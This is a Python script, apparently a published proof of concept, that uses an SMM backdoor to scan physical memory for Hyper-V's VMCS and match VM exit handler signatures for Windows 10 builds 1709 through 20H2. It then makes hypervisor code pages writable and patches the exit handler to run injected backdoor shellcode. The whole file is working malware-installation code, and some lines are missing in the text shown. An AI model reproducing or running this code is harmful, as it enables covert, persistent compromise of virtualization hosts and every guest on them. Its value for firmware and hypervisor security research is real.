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Created June 16, 2021 21:25
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Example program that uses SMM backdoor to deploy Hyper-V backdoor (see
#!/usr/bin/env python
import sys, os, time, platform, ctypes
from struct import pack, unpack
from optparse import OptionParser, make_option
import smm_backdoor as bd
# how many seconds to wait for VM exit occur
# max memory address of HOST_CR3
HV_MAX_CR3 = 0x200000000
# max number of VMCS bytes to scan for HOST_CR3 and HOST_RIP
HV_MAX_VMCS = 0x100
# Hyper-V image section alignment
HV_IMAGE_ALIGN = 0x200000
# Hyper-V image max size
HV_MAX_IMAGE_SIZE = 0x2000000
# Present flag of PML4, PDPTE, PDE and PTE
# RW flag of PDPTE, PDE and PTE
PT_RW = 0x02
# Page Size flag of PDPTE and PDE
PT_PS = 0x80
pfn_to_page = lambda val: ((val >> bd.PAGE_SHIFT) & 0xffffffffff) << bd.PAGE_SHIFT
# get MPL4 address from CR3 register value
PML4_address = lambda val: val & 0xfffffffffffff000
# get address translation indexes from virtual address
PML4_index = lambda addr: (addr >> 39) & 0x1ff
PDPT_index = lambda addr: (addr >> 30) & 0x1ff
PDE_index = lambda addr: (addr >> 21) & 0x1ff
PTE_index = lambda addr: (addr >> 12) & 0x1ff
# Hyper-V backdoor body file path
BACKDOOR_PATH = '../DmaBackdoorHv/backdoor.bin'
# ofsset of the backdoor code from the beginning of HvlpLowMemoryStub()
# size of HVBD_DATA structure, see HyperV.c
# VmExitHandler and Version field offsets of HVBD_DATA structure
m_verbose = False
# VMCS memory scan options
mem_scan_step = 0x001000000
mem_scan_from = 0x100000000
mem_scan_to = 0x200000000
VM exit handler signature for Windows 10 1709:
.text:FFFFF80000265125 mov [rsp+arg_20], rcx
.text:FFFFF8000026512A xor ecx, ecx
.text:FFFFF8000026512C mov [rsp+arg_28], rcx
.text:FFFFF80000265131 mov rcx, [rsp+arg_18]
.text:FFFFF80000265136 mov [rcx], rax
.text:FFFFF80000265139 mov [rcx+8], rcx
.text:FFFFF8000026516D mov [rcx+78h], r15
.text:FFFFF80000265171 mov rax, [rsp+arg_20]
.text:FFFFF80000265176 mov [rcx+8], rax
.text:FFFFF8000026517A lea rax, [rcx+100h]
.text:FFFFF800002651A6 mov rdx, [rsp+arg_28]
.text:FFFFF800002651AB call sub_FFFFF80000219B00
HV_SIG_1709 = [[ (0x00, 0x48), (0x01, 0x89), (0x02, 0x4c), (0x03, 0x24),
(0x11, 0x48), (0x12, 0x89), (0x13, 0x01),
(0x14, 0x48), (0x15, 0x89), (0x16, 0x49), (0x17, 0x08),
(0x48, 0x4c), (0x49, 0x89), (0x4a, 0x79), (0x4b, 0x78),
(0x86, 0xe8) ], 0x86, 1709 ]
Match hvix64.sys VM exit handler signature for Windows 10 1803:
.text:FFFFF8000027A150 mov [rsp+arg_20], rcx
.text:FFFFF8000027A155 xor ecx, ecx
.text:FFFFF8000027A157 mov [rsp+arg_28], rcx
.text:FFFFF8000027A15C mov rcx, [rsp+arg_18]
.text:FFFFF8000027A161 mov [rcx], rax
.text:FFFFF8000027A164 mov [rcx+8], rcx
.text:FFFFF8000027A198 mov [rcx+78h], r15
.text:FFFFF8000027A19C mov rax, [rsp+arg_20]
.text:FFFFF8000027A1A1 mov [rcx+8], rax
.text:FFFFF8000027A1A5 lea rax, [rcx+100h]
.text:FFFFF8000027A222 mov rdx, [rsp+arg_28]
.text:FFFFF8000027A227 call sub_FFFFF80000219C10
HV_SIG_1803 = [[ (0x00, 0x48), (0x01, 0x89), (0x02, 0x4c), (0x03, 0x24),
(0x11, 0x48), (0x12, 0x89), (0x13, 0x01),
(0x14, 0x48), (0x15, 0x89), (0x16, 0x49), (0x17, 0x08),
(0x48, 0x4c), (0x49, 0x89), (0x4a, 0x79), (0x4b, 0x78),
(0xd7, 0xe8) ], 0xd7, 1803 ]
VM exit handler signature for Windows 10 1809:
.text:FFFFF8000028B414 mov [rsp+arg_20], rcx
.text:FFFFF8000028B419 mov rcx, [rsp+arg_18]
.text:FFFFF8000028B41E mov rcx, [rcx]
.text:FFFFF8000028B421 mov [rcx], rax
.text:FFFFF8000028B424 mov [rcx+10h], rdx
.text:FFFFF8000028B454 mov [rcx+78h], r15
.text:FFFFF8000028B458 mov rax, [rsp+arg_20]
.text:FFFFF8000028B45D mov [rcx+8], rax
.text:FFFFF8000028B461 lea rax, [rcx+70h]
.text:FFFFF8000028B52D mov rdx, [rsp+arg_28]
.text:FFFFF8000028B532 call sub_FFFFF800002174F0
HV_SIG_1809 = [[ (0x00, 0x48), (0x01, 0x89), (0x02, 0x4c), (0x03, 0x24),
(0x0d, 0x48), (0x0e, 0x89), (0x0f, 0x01),
(0x10, 0x48), (0x11, 0x89), (0x12, 0x51), (0x13, 0x10),
(0x40, 0x4c), (0x41, 0x89), (0x42, 0x79), (0x43, 0x78),
(0x11e, 0xe8) ], 0x11e, 1809 ]
VM exit handler signature for Windows 10 1903 and 1909:
.text:FFFFF8000026C39F mov [rsp+arg_20], rcx
.text:FFFFF8000026C3A4 mov rcx, [rsp+arg_18]
.text:FFFFF8000026C3A9 mov rcx, [rcx]
.text:FFFFF8000026C3AC mov [rcx], rax
.text:FFFFF8000026C3AF mov [rcx+10h], rdx
.text:FFFFF8000026C3DF mov [rcx+78h], r15
.text:FFFFF8000026C3E3 mov rax, [rsp+arg_20]
.text:FFFFF8000026C3E8 mov [rcx+8], rax
.text:FFFFF8000026C3EC lea rax, [rcx+70h]
.text:FFFFF8000026C4B2 mov rdx, [rsp+arg_28]
.text:FFFFF8000026C4B7 call sub_FFFFF80000229F40
HV_SIG_1903 = [[ (0x00, 0x48), (0x01, 0x89), (0x02, 0x4c), (0x03, 0x24),
(0x0d, 0x48), (0x0e, 0x89), (0x0f, 0x01),
(0x10, 0x48), (0x11, 0x89), (0x12, 0x51), (0x13, 0x10),
(0x40, 0x4c), (0x41, 0x89), (0x42, 0x79), (0x43, 0x78),
(0x118, 0xe8) ], 0x118, 1903 ]
Match hvix64.sys VM exit handler signature for Windows 10 2004 and 20H2:
.text:FFFFF80000232372 mov [rsp+arg_20], rcx
.text:FFFFF80000232377 mov rcx, [rsp+arg_18]
.text:FFFFF8000023237C mov rcx, [rcx]
.text:FFFFF8000023237F mov [rcx], rax
.text:FFFFF80000232382 mov [rcx+10h], rdx
.text:FFFFF800002323B2 mov [rcx+78h], r15
.text:FFFFF800002323B6 mov rax, [rsp+arg_20]
.text:FFFFF800002323BB mov [rcx+8], rax
.text:FFFFF800002323BF lea rax, [rcx+70h]
.text:FFFFF80000232436 mov rcx, [rsp+arg_18]
.text:FFFFF8000023243B mov rdx, [rsp+arg_28]
.text:FFFFF80000232440 call sub_FFFFF8000020E010
HV_SIG_2004 = [[ (0x00, 0x48), (0x01, 0x89), (0x02, 0x4c), (0x03, 0x24),
(0x0d, 0x48), (0x0e, 0x89), (0x0f, 0x01),
(0x10, 0x48), (0x11, 0x89), (0x12, 0x51), (0x13, 0x10),
(0x40, 0x4c), (0x41, 0x89), (0x42, 0x79), (0x43, 0x78),
(0xce, 0xe8) ], 0xce, 2004 ]
# all of the signatures for known versions of Hyper-V
HV_SIG = [ HV_SIG_1709, HV_SIG_1803, HV_SIG_1809, HV_SIG_1903, HV_SIG_2004 ]
def find_vmcs(addr = None):
addr = mem_scan_from if addr is None else addr
while addr < mem_scan_to:
if m_verbose:
print(' * 0x%.16x' % addr)
# ask SMM backdoor to scan memory region for potential VMCS
vmcs_addr = bd.find_vmcs(addr, mem_scan_step)
if vmcs_addr is not None:
# potential VMCS region was found
return vmcs_addr
# check the next region
addr += mem_scan_step
return None
def find_low_mem(cr3):
for i in range(0, 0x10):
addr_virt = bd.PAGE_SIZE * i
addr_phys = bd.get_phys_addr(addr_virt, cr3 = cr3, eptp = None)
# check for allocated and mapped low memory page
if addr_virt == addr_phys:
# check for the short jump instruction
if bd.read_phys_mem_1(addr_phys) == 0xeb:
return addr_virt
return None
def find_vm_exit_call(code):
# enumerate known signatures
for sign, call_offset, version in HV_SIG:
for i in range(0, len(code) - 0x200):
matched = True
for offset, value in sign:
# match each byte of the signature
if value != ord(code[i + offset]):
matched = False
if matched:
# return host OS version and call offset
return version, i + call_offset
return None
def get_hv_info():
vmcs_addr = 0
# Some instructions from Hyper-V VM exit handler entry
# to validate potential HOST_RIP value
sign = [ '\x48\x89\x51\x10', # mov [rcx+10h], rdx
'\x48\x89\x59\x18', # mov [rcx+18h], rbx
'\x48\x89\x69\x28', # mov [rcx+28h], rbp
'\x48\x89\x71\x30', # mov [rcx+30h], rsi
'\x48\x89\x79\x38' ] # mov [rcx+38h], rdi
print('[+] Searching for VMCS structure in physical memory, this might take a while...\n')
print(' Scan step: 0x%.16x' % mem_scan_step)
print(' Scan from: 0x%.16x' % mem_scan_from)
print(' Scan to: 0x%.16x\n' % mem_scan_to)
while vmcs_addr < mem_scan_to:
# scan physical memory for VMCS candidate
vmcs_addr = find_vmcs(addr = vmcs_addr if vmcs_addr > 0 else None)
if vmcs_addr is None:
# nothing found
return None
ptr, host_cr3_list, host_rip_list = 0, [], []
# read VMCS contents
data = bd.read_phys_mem(vmcs_addr, HV_MAX_VMCS)
while ptr < HV_MAX_VMCS:
# get single VMCS field
val, = unpack('Q', data[ptr : ptr + 8])
if val != 0:
if val > 0xfffff80000000000 and val < 0xffffffffff000000:
# possible HOST_RIP value
elif val < HV_MAX_CR3 and val % bd.PAGE_SIZE == 0:
# possible HOST_CR3 value
ptr += 8
for host_cr3 in host_cr3_list:
for host_rip in host_rip_list:
# try to get HOST_RIP physical address
addr_phys = bd.get_phys_addr(host_rip, cr3 = host_cr3, eptp = None)
if addr_phys is not None:
# read some code from the hypervisor entry
data = bd.read_phys_mem(bd.align_down(addr_phys, bd.PAGE_SIZE), bd.PAGE_SIZE)
# check for VM exit handler signature
if data.find(''.join(sign)) != -1:
return vmcs_addr, host_rip, host_cr3
# VMCS is not valid, continue scan
vmcs_addr += bd.PAGE_SIZE
return None
def get_pte(cr3, addr):
table_addr = lambda table, index: table + (index * 8)
table_entry = lambda table, index: bd.read_phys_mem_8(table_addr(table, index))
# read PML4 entry
PML4_entry = table_entry(PML4_address(cr3), PML4_index(addr))
# chek present bit
assert PML4_entry & PT_PRESENT != 0
PDPT_addr = pfn_to_page(PML4_entry)
# read PDPT entry
PDPT_entry = table_entry(PDPT_addr, PDPT_index(addr))
if PDPT_entry & PT_PS != 0:
# return 1GB page information
return PDPT_entry, table_addr(PDPT_addr, PDPT_index(addr))
# chek present bit
assert PDPT_entry & PT_PRESENT != 0
PD_addr = pfn_to_page(PDPT_entry)
# read PD entry
PD_entry = table_entry(PD_addr, PDE_index(addr))
if PD_entry & PT_PS != 0:
# return 2MB page information
return PD_entry, table_addr(PD_addr, PDE_index(addr))
# check present bit
assert PD_entry & PT_PRESENT != 0
PT_addr = pfn_to_page(PD_entry)
# read PT entry
PT_entry = table_entry(PT_addr, PTE_index(addr))
# return 4KB page information
return PT_entry, table_addr(PT_addr, PTE_index(addr))
def infect():
jump_32_len = 5
jump_64_len = 14
# to calculate jump/call displacement
jump_32_op = lambda src, dst: pack('i', dst - src - jump_32_len)
# to generate 64-bit address jump
jump_64 = lambda addr: '\xff\x25\x00\x00\x00\x00' + pack('Q', addr)
# find HOST_RIP and HOST_CR3 fields of VMCS
info = get_hv_info()
if info is None:
print('ERROR: Unable to find VMCS')
return -1
vmcs_addr, host_rip, host_cr3 = info
print('[+] Hypervisor VMCS structure was found\n')
print(' Physical address: 0x%.16x' % vmcs_addr)
print(' HOST_CR3: 0x%.16x' % host_cr3)
print(' HOST_RIP: 0x%.16x\n' % host_rip)
# find HvlpLowMemoryStub() page
low_mem = find_low_mem(host_cr3)
if low_mem is None:
print('ERROR: Unable to find HvlpLowMemoryStub()')
return -1
print('[+] HvlpLowMemoryStub() is at 0x%.16x' % low_mem)
# backdoor code location
backdoor_addr = low_mem + BACKDOOR_OFFSET
# HVBD_DATA structure location
hvbd_addr = low_mem + bd.PAGE_SIZE - HVBD_DATA_SIZE
code_virt = bd.align_down(host_rip, bd.PAGE_SIZE)
code_phys = bd.get_phys_addr(code_virt, cr3 = host_cr3, eptp = None)
assert code_phys is not None
# read HOST_RIP code page
code = bd.read_phys_mem(code_phys, bd.PAGE_SIZE)
# find VM exit handler call by signature
info = find_vm_exit_call(code)
if info is None:
print('ERROR: Unable to match VM exit handler signature')
return -1
hv_version, offset = info
# get address of VM exit handler call
vm_call_virt = code_virt + offset
vm_call_phys = bd.get_phys_addr(vm_call_virt, cr3 = host_cr3, eptp = None)
assert vm_call_phys is not None
# get VM exit handler call displacement operand
call_op, = unpack('i', bd.read_phys_mem(vm_call_phys + 1, 4))
# get address of VM exit handler
vm_exit_virt = vm_call_virt + call_op + jump_32_len
vm_exit_phys = bd.get_phys_addr(vm_exit_virt, cr3 = host_cr3, eptp = None)
assert vm_exit_phys is not None
print('[+] Host operating system version is %d' % hv_version)
print('[+] VM exit handler is at 0x%.16x' % vm_exit_virt)
print('[+] VM exit handler call is at 0x%.16x' % vm_call_virt)
# check if VM exit call operand was already patched
if abs(call_op) < bd.PAGE_SIZE:
print('Hyper-V backdoor is already installed')
return 0
# get low memory stub page table entry
pte_val, pte_addr = get_pte(host_cr3, low_mem)
assert pte_val & PT_PRESENT != 0
# make memory page writeable
pte_val |= PT_RW
# update page table entry
bd.write_phys_mem_8(pte_addr, pte_val)
# find padding to place 14 bytes jump
jump_offset = code.find('\xcc' * jump_64_len)
if jump_offset == -1:
print('ERROR: Unable to find free space for 14 bytes jump')
return -1
jump_addr = bd.align_down(vm_call_virt, bd.PAGE_SIZE) + jump_offset
print('[+] 14 bytes jump is at 0x%.16x' % jump_addr)
assert os.path.isfile(BACKDOOR_PATH)
with open(BACKDOOR_PATH, 'rb') as fd:
# read the backdoor code
backdoor_body =
reg_push = [ '\x50', # push rax
'\x0f\x20\xd8', # mov rax, cr3
'\x0f\x22\xd8', # mov cr3, rax
'\x51', # push rcx
'\x52', # push rdx
'\x53', # push rbx
'\x56', # push rsi
'\x57', # push rdi
'\x55', # push rbp
'\x41\x50', # push r8
'\x41\x51', # push r9
'\x41\x52', # push r10
'\x41\x53', # push r11
'\x41\x54', # push r12
'\x41\x55', # push r13
'\x41\x56', # push r14
'\x41\x57', # push r15
'\xe8\x00\x00\x00\x00', # call $+5
'\x5a', # pop rdx
'\x48\x81\xe2\x00\xf0\xff\xff', # and rdx, 0xfffffffffffff000
'\x48\x83\xec\x28' ] # sub rsp, 0x28
reg_pop = [ '\x48\x83\xc4\x28', # add rsp, 0x28
'\x41\x5f', # pop r15
'\x41\x5e', # pop r14
'\x41\x5d', # pop r13
'\x41\x5c', # pop r12
'\x41\x5b', # pop r11
'\x41\x5a', # pop r10
'\x41\x59', # pop r9
'\x41\x58', # pop r8
'\x5d', # pop rbp
'\x5f', # pop rdi
'\x5e', # pop rsi
'\x5b', # pop rbx
'\x5a', # pop rdx
'\x59', # pop rcx
'\x58' ] # pop rax
backdoor_code, backdoor_entry = '', 0
# the backdoor body
backdoor_code += backdoor_body
# calculate entry address of the backdoor
backdoor_entry = backdoor_addr + len(backdoor_code)
print('[+] Backdoor entry is at 0x%.16x' % backdoor_entry)
# registers save code
backdoor_code += ''.join(reg_push)
# backdoor body call
backdoor_code += '\xe8' + jump_32_op(backdoor_addr + len(backdoor_code), backdoor_addr)
# registers restore code
backdoor_code += ''.join(reg_pop)
# 14 bytes jump to VM exit handler
backdoor_code += jump_64(vm_exit_virt)
print('[+] Backdoor code size is %d bytes' % len(backdoor_code))
# write complete backdoor code into the memory
bd.write_phys_mem(backdoor_addr, backdoor_code)
assert hvbd_addr > backdoor_addr + len(backdoor_code)
# write HVBD_DATA structure into the memory
bd.write_phys_mem(hvbd_addr, '\0' * HVBD_DATA_SIZE)
# write HVBD_DATA Version field
bd.write_phys_mem_8(hvbd_addr + HVBD_VERSION, hv_version)
# write HVBD_DATA VmExitHandler field
bd.write_phys_mem_8(hvbd_addr + HVBD_HANDLER, vm_exit_virt)
# write 14 bytes jump to the backdoor entry
bd.write_phys_mem(code_phys + jump_offset, jump_64(backdoor_entry))
print('[+] Patching VM exit handler call...')
# patch VM exit handler call
bd.write_phys_mem(vm_call_phys + 1, jump_32_op(vm_call_virt, jump_addr))
# Wait for the first VM exit with backdoor installed to flush TLB,
# we need to do this because we changed memory protection of
# HvlpLowMemoryStub() from RX to RWX. After that we can patch
# backdoor entry to remove TLB flush instructions.
# replace TLB flush instructions with NOPs
bd.write_phys_mem(backdoor_entry + 1, '\x90' * 6)
print('[+] Done, Hyper-V backdoor was successfully installed')
return 0
def main():
global m_verbose, mem_scan_step, mem_scan_from, mem_scan_to
option_list = [
make_option('--scan-step', dest = 'scan_step', default = None,
help = 'size of VMCS memory scan step'),
make_option('--scan-from', dest = 'scan_from', default = None,
help = 'start address of VMCS memory scan'),
make_option('--scan-to', dest = 'scan_to', default = None,
help = 'end address of VMCS memory scan'),
make_option('-v', '--verbose', dest = 'verbose', default = False, action = 'store_true',
help = 'show progress during VMCS scan')
parser = OptionParser(option_list = option_list)
options, args = parser.parse_args()
# check OS
assert platform.system() == 'Windows'
# check for 64-bit process
assert ctypes.sizeof(ctypes.c_void_p) == ctypes.sizeof(ctypes.c_uint64)
m_verbose = options.verbose
# set memory scan options
mem_scan_step = mem_scan_step if options.scan_step is None else int(options.scan_step, 16)
mem_scan_from = mem_scan_from if options.scan_from is None else int(options.scan_from, 16)
mem_scan_to = mem_scan_to if options.scan_to is None else int(options.scan_to, 16)
print('[+] Initializing SMM backdoor client...')
bd.init(use_timer = True)
# inject Hyper-V backdoor
return infect()
except KeyboardInterrupt:
return 0
if __name__ == '__main__':
# EoF
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